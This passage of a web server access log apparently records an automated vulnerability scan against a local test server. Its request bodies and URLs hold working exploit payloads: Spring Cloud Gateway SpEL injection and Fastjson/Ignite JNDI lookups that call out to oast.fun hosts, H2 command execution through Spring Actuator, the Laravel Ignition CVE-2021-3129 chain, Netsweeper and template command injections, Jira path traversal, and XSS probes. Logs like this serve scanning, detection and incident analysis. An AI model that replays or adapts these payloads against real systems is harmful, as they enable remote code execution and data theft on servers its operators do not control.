AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x0D\x0A \x22predicates\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22Path\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22/297MTzxE11t4HQcoBctTCN0VUiC/**\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22RewritePath\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22#{T(java.net.InetAddress).getByName(\x5C\x22c9v8h8gsmpv8c1qg07h0dq3wfiprbdamo.oast.fun\x5C\x22)}\x22,\x0D\x0A \x22_genkey_1\x22: \x22/${path}\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/routes/297MTzxE11t4HQcoBctTCN0VUiC HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x0D\x0A \x22a\x22:{\x0D\x0A \x22@type\x22:\x22java.lang.Class\x22,\x0D\x0A \x22val\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22\x0D\x0A },\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h8gsmpv8c1qg07h0opqxokchymfos.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTplDIIu3YwqAtfZpahZCjQA.php%5Cx0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\x22,\x0D\x0A \x22jndiNames\x22:\x22rmi://c9v8h8gsmpv8c1qg07h0bpwyea3495yxw.oast.fun/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x0D\x0A \x22predicate\x22: \x22Paths: [/297MTzxE11t4HQcoBctTCN0VUiC], match trailing slash: true\x22,\x0D\x0A \x22route_id\x22: \x22297MTzxE11t4HQcoBctTCN0VUiC\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A \x22[[RewritePath #{T(java.net.InetAddress).getByName(\x5C\x22c9v8h8gsmpv8c1qg07h0454zcxtbrf8yg.oast.fun\x5C\x22)} = /${path}], order = 1]\x22\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/refresh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MTwbla4X0sBMkIHOcjoPefaG/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DELETE /actuator/gateway/routes/297MTzxE11t4HQcoBctTCN0VUiC HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"DELETE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MTwbla4X0sBMkIHOcjoPefaG/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x0D\x0A \x22name\x22:\x22spring.datasource.hikari.connection-test-query\x22,\x0D\x0A \x22value\x22:\x22CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/env HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/resource_config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm935/index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm/ess.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboardUser HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configure/app/landing/welcome-srm-va.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22\x22:1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet/showenv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/3 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.997","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.hg/hgrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /atg/bcc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) 